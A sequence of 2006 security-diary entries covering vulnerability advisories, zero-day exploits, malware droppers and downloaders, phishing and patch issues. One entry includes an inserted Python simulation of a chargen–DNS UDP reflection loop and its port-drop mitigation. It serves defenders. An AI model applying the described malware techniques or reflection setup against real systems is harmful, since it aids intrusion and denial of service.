Published: 2006-06-30

Root-Level Exploit for OSX LaunchD Service

The diary entry from June 28th covered the release of OS X 10.4.7, which addressed various security issues.  There is now a publicly available exploit for the format string vulnerability in the launchd daemon in versions of OS X up to and including 10.4.6, which can result in an attacker gaining root access on the system.

You can get more information about the vulnerability and exploit from Security Focus.

If you haven't already installed the update, time to get moving.

Thanks to Juha-Matti for the information.


Published: 2006-06-30

OpenOffice.org Vulnerabilities

OpenOffice.org released a security bulletin today that addresses three security issues in the OpenOffice.org software which were discovered during an internal code audit.  The vulnerabilities affect both the older 1.1.x and the newer 2.0.x releases.  OpenOffice.org has released version 2.0.3 which resolves the issues.  A patch for version 1.1.5 will be available soon.  Without the patch, one of the issues has a possible workaround to alleviate the issue; the other two do not.

OpenOffice.org has additional security notes on their site that address the three specific issues:

  • Java Applets

    It is possible for some Java applets to break out of the secure "sandbox" in which they are normally constrained.  The applet code could potentially have access to the entire system with whatever privileges the current user has.

    A workaround is provided to temporarily disable support for Java applets.  Instructions are provided for both 1.1.x and 2.0.x.
  • Macros

    A flaw with the macro mechanism could allow an attacker to include certain macros that would be executed even if the user has disabled document macros.  Such macros could potentially have access to the entire system with whatever privileges the current user has.

    There is no workaround for this issue.
  • File Format

    A flaw in the parsing of the XML file formats allows for possible buffer overflows in specially malformed documents.  The buffer overflow can crash the OpenOffice.org application and might be exploitable for arbitrary code-execution.

    There is no workaround for this issue.

Thanks to Juha-Matti for the heads-up.


Published: 2006-06-29

iTunes < 6.0.5 vulnerability & patch released

Apple has released an update for iTunes that fixes an integer overflow in the AAC file parsing that can lead to code execution. Y'all want to get this one patched and updated.

APPLE-SA-2006-06-29 iTunes 6.0.5

iTunes 6.0.5 is now available and, in addition to its other content,
fixes the following security issue:

CVE-ID:  CVE-2006-1467
Available for:  Mac OS X v10.2.8 or later, Windows XP / 2000
Impact:  An integer overflow in iTunes could cause a denial of
service or lead to the execution of arbitrary code
Description:  The AAC file parsing code in iTunes versions prior
to 6.0.5 contains an integer overflow vulnerability. Parsing a
maliciously-crafted AAC file could cause iTunes to terminate or
potentially execute arbitrary code. iTunes 6.0.5 addresses this
issue by improving the validation checks used when loading AAC
files. Credit to ATmaCA working with TippingPoint and the Zero Day
Initiative for reporting this issue.


Published: 2006-06-29

Cisco Wireless Access Point Vulnerability Announced

Cisco has released a vulnerability disclosure for their Wireless Access Points:


The vuln is in the web interface for the APs and could allow wiping of the security config and access to the administrative interface without authentication.

To quote Cisco:

A vulnerability exists in the access point web-browser interface when Security > Admin Access is changed from Default Authentication (Global Password) to Local User List Only (Individual Passwords). This results in the access point being re-configured with no security, either Global Password or Individual Passwords, enabled. This allows for open access to the access point via the web-browser interface or via the console port with no validation of user credentials.

The following access points are affected if running Cisco IOS® Software Release 12.3(8)JA or 12.3(8)JA1 and are configured for web-interface management:

  • 350 Wireless Access Point and Wireless Bridge
  • 1100 Wireless Access Point
  • 1130 Wireless Access Point
  • 1200 Wireless Access Point
  • 1240 Wireless Access Point
  • 1310 Wireless Bridge
  • 1410 Wireless Access Point


Published: 2006-06-29

Deja Vu - Advances in Rootkit malware

There are two great analyses of the same piece of improved rootkit malware: Hiding the Unseen at F-Secure's blog and Raising the Bar: Rustock.A and Advances in Rootkits at Symantec's blog.


Published: 2006-06-29

Always get permission - VA stolen laptop recovered

The recovery of the stolen VA laptop is good news for US Veterans, and the story indicates that the employee blamed for the problem apparently had permission - "Newly discovered documents show that the VA analyst blamed for losing the laptop had received permission in 2002 to work from home on data that included millions of Social Security numbers on a laptop from home." Inquiring minds want to know: who are they going to blame now?


Published: 2006-06-28

New version of OSX available

Apple announced yesterday that a new version of OSX (10.4.7) is available and recommended for all users:


To quote the announcement:

It includes fixes for:
- preventing AFP deadlocks and dropped connections
- saving Adobe and Quark documents to AFP mounted volumes
- Bluetooth file transfers, pairing and connecting to a Bluetooth mouse, and syncing to mobile phones
- audio playback in QuickTime, iTunes, Final Cut Pro, and Soundtrack Pro applications
- ensuring icons are spaced correctly when viewed on desktop
- determining the space required to burn folders
- iChat audio and video connectivity, creating chat rooms when using AIM
- importing files into Keynote 3
- PDF workflows when using iCal and iPhoto
- reliable use of Automator actions within workflows
- importing and removing fonts in Font Book
- syncing addresses, bookmarks, calendar events and files to .Mac
- compatibility with third party applications and devices
- previous standalone security updates

SHA1: MacOSXUpd10.4.7Intel.dmg = 2a25ed61d586b71ba7282fb896b2c910785ff358

SHA1: MacOSXUpd10.4.7PPC.dmg = 223d1fc9197a6a96c9d2f2a9110d37abc219c3a6


Published: 2006-06-28

Two new Internet Explorer vulnerabilities disclosed including PoC

Two vulnerabilities in Internet Explorer were published yesterday to the Full-Disclosure mailing list along with their associated PoC code.

The first is a critically rated IE vulnerability in the use of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) that tricks a user into opening a file by double clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site.  The currently published PoC is limited in that it requires the user to double click on an icon to execute a potentially malicious payload, but we can expect to find creative use of this exploit in the wild very soon.  The workaround for this appears to be disabling active scripting.

The second vulnerability is related to the handling of the object.documentElement.outerHTML property. Abuse of this property allows an attacker to retrieve remote content in the context of the web page currently being viewed by the user. This vulnerability can be potentially nasty, as attackers can use it to retrieve data from other web sites the user is logged into (for example, webmail) and harvest user credentials.  Several handlers have spent a little more time validating this particular issue and, while it is a subtle exploit and rated a lower level risk, this issue has raised some of our neck hairs.

Microsoft is investigating both issues and Secunia posted a PoC web page for the second vulnerability that you can find at http://secunia.com/internet_explorer_information_disclosure_vulnerability_test.

Regarding the second vulnerability, what's interesting is that we were able to reproduce this even when using Mozilla Firefox.

We have not received any reports of these vulnerabilities being actively exploited in the wild. Please let us know if you have more information and we'll update the diary accordingly.

** As another worthy 'Handler tools' mention: a general protection tool that has been gaining increased use in the testing of malicious code and the reviewing of potentially malicious websites is Sandboxie.  Browse safely over to http://www.sandboxie.com.

Bojan Zdrnja
William Salusky


Published: 2006-06-27

Word macro trojan dropper and (another) downloader

We've seen a lot of new malware being spammed in the last couple of hours.

The first malware exploits an old vulnerability in Microsoft Word, MS01-034 (http://www.microsoft.com/technet/security/Bulletin/MS01-034.mspx). This vulnerability allows an attacker to execute embedded macros no matter what macro security level the user has set in Microsoft Word. Of course, as this is a pretty old vulnerability, only terribly outdated installations will be affected. If you are running any newer version of Microsoft Word, macro settings are on High by default, so only macros signed by trusted sources are executed and all other macros are disabled. A user would have to change this setting to Medium (so they get asked) or Low in order to run this macro. The Word document comes in a ZIP file and, once executed, installs a Trojan. Detection of the Word document is pretty good at the moment.
The document pretends to list computer prices:

The other malware is a plain old (and boring?) downloader, but we've seen a large number of e-mails being spammed with it. The downloader uses typical social engineering to trick the user into opening the archive. Besides the e-mail telling the user there's a nice photo in the attachment, the executable name will be something like DC0019.JPG__[lots of _]__JPG.exe.
The executable always seems to be in a ZIP archive, but sometimes it is encrypted (in which case the password is in the e-mail body) and sometimes it's not.

Once executed, the downloader will install on the system and try to download two files:

http://  /img/util/logo_nav.jpg

which is a Symantec logo (more social engineering) and

http:// /flash/menu.swf

this is a site in Korea and the last time we checked the file was not there.

AV detection is pretty low at the moment and only a couple of AV products detected this: Symantec, NOD32, Norman, Trend Micro, Sophos. They either detect it as a downloader or generically (Bloodhound.W32.EP in Symantec's case).


Published: 2006-06-27

New Mambo, Joomla releases fix security vulnerabilities

Various security vulnerabilities have been identified in the two most popular open source CMS (Content Management System) packages.

All versions of Mambo prior to 4.6RC1 are vulnerable to a SQL injection attack in the weblinks.php file. You can patch this manually, as only two variables need to be escaped, or you can download patches from the Mambo web site, http://www.mamboserver.com.
We've also received reports that some vulnerabilities in previous versions of Mambo (older than 4.5.3) are being actively exploited, so be sure that you are running the latest version, with the security patch installed. If we get more information about attacks we'll post an update.

The new release of Joomla, 1.0.10, also fixes a couple of security vulnerabilities. Joomla is also vulnerable to SQL injection attacks, of which three rated critical were fixed in the latest release. As the latest version fixes other security vulnerabilities and numerous bugs, users are urged to upgrade. You can find more information on the Joomla web site, http://www.joomla.org.


Published: 2006-06-25

Reminder about MS06-025

The original patch from Microsoft caused issues with dialup.  A new patch was released June 21 (or thereabouts) that addressed this issue.  Exploit code is available that leverages the MS06-025 vulnerability.  This allows an authenticated attacker to execute arbitrary code on Windows 2000 and XP SP2 systems.  Previous versions allow unauthenticated attackers to execute arbitrary code; this is your garden-variety "bad-thing(tm)."


Published: 2006-06-25

Excel Issue Scorecard

To help clearly identify the issues, exploit code and remedy related to the recently announced Excel vulnerabilities, I offer this humble correlation.  This information comes from Microsoft, Mitre, and vigilant readers sending in tips.  My thanks go to all.

CVE-2006-3059 aka "Excel Repair Mode" http://www.microsoft.com/technet/security/advisory/921365.mspx
Exploited by: Mdropper.G, Booli.A, Flux.E, Booli.B

CVE-2006-3086 aka "Long Hyperlink"   http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Exploited by: Urxcel.A, and three known public exploit code examples

CVE-2006-3014 aka "Shockwave vulnerability"
Exploited by proof of concept code Flemex.A
The workaround is a killbit.


Published: 2006-06-24

Field Day Exercise

Over this weekend, ham radio operators (who aren't at the World Cup) are participating in an annual emergency communications preparations exercise known as Field Day (http://en.wikipedia.org/wiki/Field_day).  It emphasizes the use of emergency and alternative power sources.  In the spirit of this exercise I'm running on backup power today to determine how long my setup will last and work out the bugs.


It has not been going smoothly today, but that's the point of the exercise I suppose.


How long can your critical systems operate without grid power?


Published: 2006-06-23

Sudo For Windows

One of my colleagues sent me a URL today for an interesting utility I have been wishing I had for a while in the Windows environment, and I thought I would share it with you this evening.  For those of us that learned Unix systems administration prior to dealing with the Windows environment, sudo was one of those tools that made it much easier to compute more safely.  Well, sudo is now available for the Windows operating system as well.  This tool is somewhat different from the RunAs command in that you use your own passphrase (with the right configuration) to elevate privileges while running a particular application.  For those Unix geeks out there, RunAs is probably likened to su in some respects.  So if you were ever looking for a sudo for Windows, take a look at http://sudowin.sourceforge.net/ .


Published: 2006-06-22

Malware propagation information from Microsoft

Microsoft recently released a report on the statistics they are collecting via MSRT.

If you need to know what kinds of malware are being detected and removed by the Malicious Software Removal Tool, this is a great report. It only covers Windows of course, but that makes sense.

There is a nice executive summary but please read beyond that. One security trade publication clearly misread the summary and posted a misquote (62% of computers infected with a backdoor). That is not what the report states. The 62% number is the percentage of machines that had malware removed from them by MSRT AND had a backdoor installed on them. Restated: more than half of the machines where an infection was detected and removed also had remote control backdoors on them. No surprise there really. Although there are ways for the hackers to use a system without a backdoor tool installed, for the most part the hackers want to be able to remotely upgrade and control systems they have compromised.

The actual report comes from the Rapid Response Team Waggener Edstrom Worldwide.

Overall the report is very good. There are lots of nice charts and graphs. The author did a good job normalizing statistics but also provided the unnormalized view. They don't really mention false negatives until nearly the end of the document. I do not completely agree with their malware categories; however, since those are well defined up front, I had no problem understanding what they meant by email worm, p2p worm, IM worm, exploit worm, backdoor Trojan, rootkit or virus. They also claim that MSRT is part of a defense in depth even when you have another antivirus package installed. Due to its lack of realtime protection I would say it's not defense at all. It's reactive and only comes into play after the fact of infection. Since it is also fairly limited in the malware it detects and the signatures are usually only updated once a month, I don't know of any current antivirus package that would miss a virus that MSRT would detect. So I do not agree that this provides defense in depth. I do however see serious benefit to running MSRT. It certainly has contributed to the effort of getting infected systems cleaned.

Some other fun facts I gleaned from this report:
  • MSRT only removes live malware or malware that will be autorun during a reboot.
  • 1 computer in 355 had malware that was recognized and removed.
  • 5% of the rootkits removed were WinNT/F4IRootkit (aka the Sony rootkit), with about 420k removals from 250k machines.
  • 35% of the computers infected were infected via the end user clicking on or opening something.
  • 20% of the computers cleaned had been infected sometime in the past.

So if you have a little time and you are interested in malware propagation I recommend reading this report.


Published: 2006-06-22

isc.org provides attack mitigation

A new version of BIND, 9.3.3b1, was recently released. The CHANGES file lists one security fix, which addresses a DDoS reflection issue.

Some services respond to potentially spoofed UDP packets.

Upgrade to BIND 9.3.3b1.

Drop UDP packets from the standard service ports 7, 13, 19, 37 and 464 (echo, daytime, chargen, time, and kpasswd) towards your DNS server(s). You will probably never see any valid queries from such a low port; in general, DNS queries should be sourced from ports above 1024.

Disable or restrict access to UDP services that don't need to be open to the internet.

Detailed description:
The basic issue here is very old. It was originally reported in 1999. The CVE number for it is CVE-1999-0103. http://nvd.nist.gov/nvd.cfm?cvename=CVE-1999-0103
"Echo and chargen, or other combinations of UDP services, can be used in tandem to flood the server, a.k.a. UDP bomb or UDP packet storm."

If you consider DNS to be one side of an "other combination" of UDP services, this is not new. What is new is that this version of BIND will not send FORMERR packets if the original packet came from the set of well-known UDP ports listed above. ISC.ORG has added code to mitigate attacks that use well-known spoofed source ports. I do not know of any other DNS software vendor that has added this capability.

Seven years ago CERT and others warned us not to leave things like echo and chargen open.
However, some OS and network equipment vendors still ship products with those types of services enabled by default and open to the world. Those services have not been in common usage since the 1990s.

From the CHANGES file in the 9.3.3b1 source directory:
--- 9.3.3b1 released ---
1951.    [security]           Drop queries from particular well known ports.
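The reflection loop described above and the 9.3.3b1 rule that breaks it, as an added Python model that is not ISC's code: chargen and a DNS server are reduced to reply functions, the port set is the one listed in this entry, and the spoofed trigger datagram and the legitimate query are constructed for the example.

```python
"""
Added example (not ISC's code): a model of the UDP reflection loop behind
CVE-1999-0103 and of the BIND 9.3.3b1 fix "Drop queries from particular well
known ports".  Two services are simulated: chargen (UDP 19), which answers every
datagram with a line of text, and a DNS server (UDP 53), which answers anything
it cannot parse as a query with FORMERR.  One datagram with a spoofed source
port of 19 then bounces between them until something breaks the loop.
"""
from collections import deque
from dataclasses import dataclass

DNS_PORT = 53
CHARGEN_PORT = 19
# echo, daytime, chargen, time, kpasswd: the source ports the diary says to drop
WELL_KNOWN_UDP_PORTS = {7, 13, 19, 37, 464}
# RFC 864 chargen: 72 printable characters per line, followed by CRLF
CHARGEN_LINE = bytes(range(33, 33 + 72)) + b"\r\n"

@dataclass(frozen=True)
class Datagram:
    src_port: int
    dst_port: int
    payload: bytes

def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Encode a minimal standard DNS query (type A, class IN) for `name`."""
    header = txid.to_bytes(2, "big") + b"\x01\x00\x00\x01" + b"\x00" * 6
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + b"\x00\x01\x00\x01"

def is_standard_query(payload: bytes) -> bool:
    """Accept only a well-formed standard query carrying exactly one question."""
    if len(payload) < 12:
        return False
    flags = int.from_bytes(payload[2:4], "big")
    if flags & 0x8000 or (flags >> 11) & 0xF != 0:  # QR set, or opcode != QUERY
        return False
    if int.from_bytes(payload[4:6], "big") != 1:    # QDCOUNT must be 1
        return False
    pos = 12
    while True:                                     # walk the QNAME labels
        if pos >= len(payload):
            return False
        length = payload[pos]
        pos += 1
        if length == 0:
            break
        if length > 63 or pos + length > len(payload):
            return False
        pos += length
    return pos + 4 <= len(payload)                  # QTYPE and QCLASS present

def dns_handle(dg: Datagram, drop_well_known: bool):
    """Model of the DNS server: the reply datagram, or None for a silent drop."""
    # The 9.3.3b1 rule (and the diary's firewall advice): a query sourced from a
    # well-known service port is never legitimate, so it is discarded unanswered.
    if drop_well_known and dg.src_port in WELL_KNOWN_UDP_PORTS:
        return None
    rcode = 0 if is_standard_query(dg.payload) else 1  # 1 = FORMERR
    txid = dg.payload[:2].ljust(2, b"\x00")
    flags = (0x8000 | rcode).to_bytes(2, "big")        # QR=1 plus the RCODE
    return Datagram(DNS_PORT, dg.src_port, txid + flags + b"\x00" * 8)

def chargen_handle(dg: Datagram) -> Datagram:
    """Model of chargen: any datagram at all gets a line of text back."""
    return Datagram(CHARGEN_PORT, dg.src_port, CHARGEN_LINE)

def simulate(first: Datagram, drop_well_known: bool, max_steps: int = 100) -> int:
    """Count datagrams exchanged once `first` arrives; hitting max_steps means
    the two services kept feeding each other and nothing stopped the loop."""
    queue = deque([first])
    exchanged = 0
    while queue and exchanged < max_steps:
        dg = queue.popleft()
        exchanged += 1
        if dg.dst_port == DNS_PORT:
            reply = dns_handle(dg, drop_well_known)
        elif dg.dst_port == CHARGEN_PORT:
            reply = chargen_handle(dg)
        else:
            reply = None  # an ephemeral port with nothing listening on it
        if reply is not None:
            queue.append(reply)
    return exchanged

# Constructed sample traffic: one spoofed trigger datagram and one real query.
SPOOFED = Datagram(src_port=CHARGEN_PORT, dst_port=DNS_PORT, payload=b"junk")
LEGIT = Datagram(src_port=40000, dst_port=DNS_PORT, payload=build_query("example.com"))

if __name__ == "__main__":
    print("unpatched:", simulate(SPOOFED, drop_well_known=False))  # 100: never stops
    print("9.3.3b1:  ", simulate(SPOOFED, drop_well_known=True))   # 1: trigger dropped
    print("legit:    ", simulate(LEGIT, drop_well_known=True))     # 2: query + answer
```

The same source-port test is what the firewall rule in this entry implements in front of a server that has not been upgraded; the legitimate query from an ephemeral port is answered in both configurations.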


Published: 2006-06-22

Top 100 security tools

Fyodor, the author of Nmap, has released the results of his 2006 network security tool survey. This list is full of tools that can assist in network auditing, defense and forensics. Although it is near the top of my personal list, nmap didn't make the list because Fyodor excluded it. The list includes a short description, cross links leading to categories, intuitive icons to show what OS it runs on natively and icons for availability of source code, GUI, and CLI.
You can find the list at http://SecTools.Org

From that link:
"I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also will be pointing newbies to this site whenever they write me saying "I don't know where to start".
Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also means that the list is slightly biased toward "attack" tools rather than defensive ones."


Published: 2006-06-21

Opera 9 long href PoC

Well, it didn't take long.  Yesterday, Opera 9 came out, today there is a proof of concept for a long href denial of service exploit.  No word on when a patch will be available.


Published: 2006-06-21

Yahoo! Login Server Problems

We have received a number of reports indicating problems with various parts of Yahoo! services (mail, IM, groups). These services all seem to work properly with cached credentials, so we suspect that there is a problem with part of the authentication system.  We have _no_ confirmed information of what is the source of these difficulties, but will continue to monitor and update this diary when more information is available.

ISC Handlers


Published: 2006-06-20

Opera 9.0 released

For those looking for an alternative browser, there is one that has been overlooked a little in the IE-Firefox wars.  Opera has been around for quite a while and works rather well.  Today, they have unveiled version 9.0.  Among the nice features touted in this release is the ability to control pop-ups and javascript on a site-by-site basis.  I haven't had a chance to give this one a thorough testing yet, but would welcome observations from our readers.  The other 2 big players are also scheduled to get new major versions this year, IE7 is in beta and the Mozilla folks are promising Firefox 2 later this year.



Published: 2006-06-20

New Bagle in Encrypted Zip File Attachments

There is a new Bagle variant making the rounds.  Seems to be spreading slowly.  Email arrives with a .zip attachment that is encrypted with a password.  The password is stored in an image file that is also an attachment.  Anti-virus software that looks for the password in the text won't find it.  More details here: http://www.sophos.com/pressoffice/news/articles/2006/06/baglekl.html


Published: 2006-06-20

Comments on 0day

Given the recent rumors about 0day in IIS and confirmed 0day in several different Microsoft Office applications, these comments seem appropriate.

The first question I pose is: why the sudden increase in vulnerabilities that are published as 0day instead of responsibly disclosed?  This isn't intended to be a comment on full-disclosure.  But if you look over the past couple of years, almost all vulnerabilities that are discovered by actual researchers (not criminals) were disclosed responsibly to Microsoft.  Is the researching community becoming disenchanted with the long Microsoft patch cycle?  Is there more incentive (fame) for researchers to disclose full details to bugtraq or full-disclosure?  Is there more incentive (financial) to sell an exploit to iDefense, 3com, or the highest bidder on eBay?  If you are a software vendor, what are you doing to ensure that vulnerability researchers are kept happy and disclosing security bugs responsibly?

Now here is where I can feel people firing up their flamethrowers.  There has been lots of panic and rumors recently about 0day bugs.  And it isn't just focused on Microsoft products.  We occasionally get e-mail asking if we know about 0day in OpenSSH, Apache, and PHP.  The question shouldn't be whether 0day exists.  Because 0day exists and it will always exist.

The question is whether you or your organization would be the target of such an exploit?  The time is long gone for an exploit author to embed his nice 0day into a worm and let it run rampant through the Internet.  Today, 0day exploits are more likely to be used for military purposes, financial crime, and possibly terrorist activities (although, probably not).

So in reality, the organizations that really need to be concerned about 0day are the ones responsible for protecting military/government assets, financial institutions, and critical infrastructure agencies.  Since you know 0day exists and if you are a target, what are you doing to protect yourself?  How do you protect against, detect, and respond to unknown vulnerabilities?

For the rest of the folks out there (small/medium businesses, hobbyists)... Should you worry about 0day?  Usually not, but if you have all the other critical security components in place then go ahead.

I'm curious to know what kinds of 0day protection systems people have in place?  In the *NIX world, there are some fairly decent (and free) options for protection:  Grsecurity, NSA SE Linux, Systrace, LIDS, ProPolice GCC patch and others.  How about the Windows side?  There doesn't seem to be much for the folks without hardcore $$.  CORE security has something new called Force (http://force.coresecurity.com/) that looks quite promising.  There is also a good list of commercial products for Windows and some comments compiled by fellow handler Jason Lam here: http://isc.sans.org/diary.php?storyid=635

In summary, you should expect 0day to be alive and well for your favorite operating systems, daemons, and applications.  And if it concerns you, then do something about it instead of waiting to get smacked with it later.  You will sleep better at night and not be frustrated at your favorite software vendor when they take 6+ months to patch simple little vulnerabilities.


Published: 2006-06-20

New Excel 0day (Are we evolving or going in circles?)

(Now before I get hatemail from all the Microsoft fanboys out there, please note that these comments are not derogatory towards Microsoft.  Microsoft has like 110% market share according to their research, so that's why they get all the attention.)

Today there is news of another 0day vulnerability in Microsoft Office.  You can check your favorite vulnerability notification service for all the gory details.  Someone wrote asking for comments and honestly I don't have any step-by-step instructions for defending against this specific threat.  All of the general high-level recommendations from the MS Word 0day a couple of weeks ago still apply.  Perhaps we will have something more detailed later when the details are more clear.

Instead, here are some thoughts about the current state of vulnerability discoveries.  If you have followed along with the industry in the last couple of years, you have probably noticed that remote root/administrator type bugs have slowly disappeared and now seem to be fairly rare.  Most vulnerability researchers that are publishing advisories now seem to focus on web applications and clients (web browsers, Office, etc).  I am honestly expecting to see a healthy stream of client vulnerabilities in Office applications over the next 2-3 years.  Several years ago, nobody cared too much about exploitable bugs in client side applications because remote bugs were still readily available.  Of course, given the recent media attention about the MS Word 0day exploit, a lot of vulnerability researchers are now hitting Word with every available fuzzer that they have.

So now we have a scenario where there will be a good number of 0day vulnerabilities discovered in client-side applications like MS Office and OpenOffice.  Users will be advised not to open documents from unknown persons.  So have we evolved?  Or have we just jumped back in time ten years when every aspiring script kiddie was writing VBA Macro viruses?

Keep reading for another article about 0day...


Published: 2006-06-20

The dangers of shared web hosts

A reader alerted us today about yet another web server compromise, affecting a large number of domains. In this particular case, the server was hosted with iPowerWeb, a provider of low cost web space on shared servers.

Space on a shared server is ok for personal use. But you should think twice before using it for commercial, in particular business critical, use. Your web site's security will depend on a few hundred other users on the same system doing the right thing. A bad php script on one virtual server could lead to a compromise of all web sites hosted on the same system.

If you have to use a virtual host, try to follow these tips to make things "as secure as possible":
  • Don't go with the lowest bidder. You still rely on the hosting company to maintain the server and there is not much maintenance that can be done for $1/month.
  • Check references. Look at sites like zone-h.org for defacement history and netcraft.com for stats like uptime.
  • Keep solid backups of your files on a local system!
  • Avoid files and directories that are writable by anybody but yourself. In particular, avoid files writable by the web server.
  • Do not rely on any access control provided by php/perl/cgi scripts. Other users may bypass it with their own scripts.
If you are providing shared web space, try to follow these rules:
  • Know your customers. Avoid handing out accounts before billing details are validated. Try to verify credit card payments by phone.
  • Consider virtual systems (Xen, VMware...). While not perfect, it's a lot better than housing all users on the same system.
  • Chrooted user accounts can be almost as good as virtual hosts. But they can be hard to maintain, and they still use the same web server process, which may cross over chrooted users.
  • Monitor user activity carefully.
  • Use a host based IDS to detect intrusions quickly.
  • Got backups?


Published: 2006-06-19

Rumors about IIS 6.0 issues

Update: All feedback we received so far points to the microsoft.fr defacement being an isolated issue.

Some persistent rumors talk about a possible new exploit (0-day?) against IIS 6.0. The defacement of experts.microsoft.fr is used as evidence. At this point, we have nothing to support that claim. If you have any additional evidence, please let us know. An image of the alleged defacement can be found at Flickr: http://www.flickr.com/photos/affandesign/169734004/in/photostream/. Also see http://www.zone-h.org/content/view/4767/31/ for a mirror of the defacement.


Published: 2006-06-18

Empty emails?

I got the first completely empty email sometime late Friday evening, and deleted it without investigating any further. Then I received two more Saturday morning. Now I've gotten almost a dozen, each from a different netblock around the world, and sent to different domains. The SANS NOC has seen 500+. The Internet Storm Center has gotten two queries about them.

There is some speculation it may be malware related, as in a poorly written piece of code spewing out empty emails. One other theory involves confirming known good addresses to seed a new piece of malware or spam. Is this related to Yamanner (sp?)?



Published: 2006-06-18

Excel new vuln FAQ

Update: A perl script was published on Milw0rm which appears to exploit *some* Excel vulnerability. It creates a spreadsheet including a very long URL. Once the user clicks on the URL, Excel will crash. As our reader Dominic pointed out, the script does not claim to be the 0day under discussion. VirusTotal does not trigger any signatures on the Excel file generated by the exploit.

Juha-Matti, a regular ISC contributor, has written up some information into a FAQ. This is with regards to a recently discovered, previously unknown vulnerability in Microsoft Excel. Gotten tired of the phrase '0day'?  I sure have.


Although I do not entirely agree with all of his advice, I think that the first and only defense is - defense in depth.
Do NOT rely solely on antivirus.
Do NOT rely solely on filtering by extension.
Do NOT open Excel files that appear unsolicited in your mailbox.
No single tool or measure is sufficient.

I am hoping that the point is getting across: do not rely on traditional defensive measures. It is quite likely they will prove inadequate against a custom-made targeted trojan built just to penetrate your infrastructure, particularly one using an undisclosed vulnerability. No signature-based tool can help you in this case.

(Maddison's Baba)


Published: 2006-06-17

Update on the Paypal Phish Phlaw

According to an article posted at news.com, PayPal has fixed the flaw in their website that was reported in yesterday's Diary.

PayPal fixes phishing hole

Thanks to one of our readers for supplying us with the information.


Published: 2006-06-17

Happy Father's Day

I just want to take this opportunity to wish all of the dads in our reading audience a very Happy Father's Day.  No matter what you do for a living, or what your career path is, we know that you have one of the hardest jobs - being a good dad and good role model for your children and all of the children you come in contact with.  I am proud to say that I serve with some of the best dads.  The dads of the Handlers group and all of us care about the future generations. That is one of the reasons that we work so hard at keeping each of you informed about the happenings on the Net.

So to my fellow Handler "guys" I say Happy Father's Day to some of the best dads I know. To my own dad, who will celebrate 72 years next week, I say thanks for all you do.  To all of you I say Happy Father's Day.


Published: 2006-06-17

Known Issues for the MS06-025

It appears the Microsoft Security Response Center has issued a known issues update to MS06-025.  According to Stephen Toulouse at the Microsoft Security Response Center blog, the update has broken dial-up scripting for those that are still using dial-up.

Microsoft Security Response Blog

Thanks to Juha-Matti for calling this to our attention.


Published: 2006-06-16

Phishes, Phlaws and Phurther Network Phollies

Pay Pal Phlaw?

We've received a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users.

The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal.

When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member log-In page.

Logging in sends the PayPal username and password to the bad guys and brings up another page asking for more information (social security number, credit card number, ...) to "remove the limits" on their account.

More to come as we confirm information.

FDIC Phish

Juha-Matti dropped us a link to a newly added US-Cert Advisory detailing a scam targeting customers of FDIC insured institutions.


Published: 2006-06-16

Adobe Reader Update

Adobe has released an update for reader in which "several security bug fixes have been made, with one considered critical for the Macintosh OS and several considered to have a low rating for Windows."

Details can be found on Adobe Support Knowledgebase article 327817


Published: 2006-06-16

Reports of Excel 0-Day

Microsoft has received a report of a new 0-day vulnerability involving Excel.  They are currently investigating this issue and will issue more information on workarounds as it becomes available.  They are currently blogging about it at http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx so check that site for more information as it becomes available.

In the meantime, we continue to recommend the same defenses we recommended with the Word 0-day from last month located at http://isc.sans.org/diary.php?storyid=1347. These very general best practices should help alleviate the danger until Microsoft releases a patch or more specific workarounds.

Update - We've received reports (thanks Juha-Matti) that Symantec is detecting this attack.

Trojan.Mdropper.J is the detection for the malicious .xls which uses the 0-day exploit to drop Downloader.Booli.A.

The Symantec website also reports ..

Downloader.Booli.A may arrive on the compromised computer, dropped by Trojan.Mdropper.J, with the following name:


Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

When Downloader.Booli.A is executed, it performs the following actions:

  1. Attempts to run Internet Explorer and inject its code into Internet Explorer to potentially bypass firewalls.
  2. Attempts to download a file from the following location:
    Note: At the time of writing the remote file was not available.
  3. Saves the file as the following and if the download was successful, executes the file:
  4. Creates an empty file before exiting:

We'll pass on more information as we receive it.



Published: 2006-06-15

Potential Patch Problem with MS06-025

We have received some reports of a potential issue with MS06-025.  Here is a snippet of what appears to be the problem, as it was reported to us:

"We received couple of calls that users are
not able to dial up after applying MS06-025 (KB911280).

I verified this on a test machine and it looks like it breaks dial up.

We have some scripts that need to be run in order to authenticate the user
properly after the dial up connection is established.

It looks like the patch prevents scripts from running at all. Even when I
turned on the terminal window (in interactive logon and scripting) I can't
log in manually at all. After the connection is established I can see the
Username prompt in the terminal window but I can't enter any data.

Uninstalling the patch fixes this."

UPDATE:  The case number and guidance we received from Microsoft have been changed.  Sorry for the initial confusion that some of you may have faced trying to use this case number.  Here is the updated guidance from Microsoft that we have been given.  They want each customer to open their own case.  You need to mention MS06-025 breaking dial-up; your case will be created and then added to the master case.  The number to use to contact Microsoft for free support for issues such as these remains the same: 1-(866) PC-SAFETY.


Published: 2006-06-15

Sendmail Multi-Part MIME Message Handling Denial of Service vulnerability

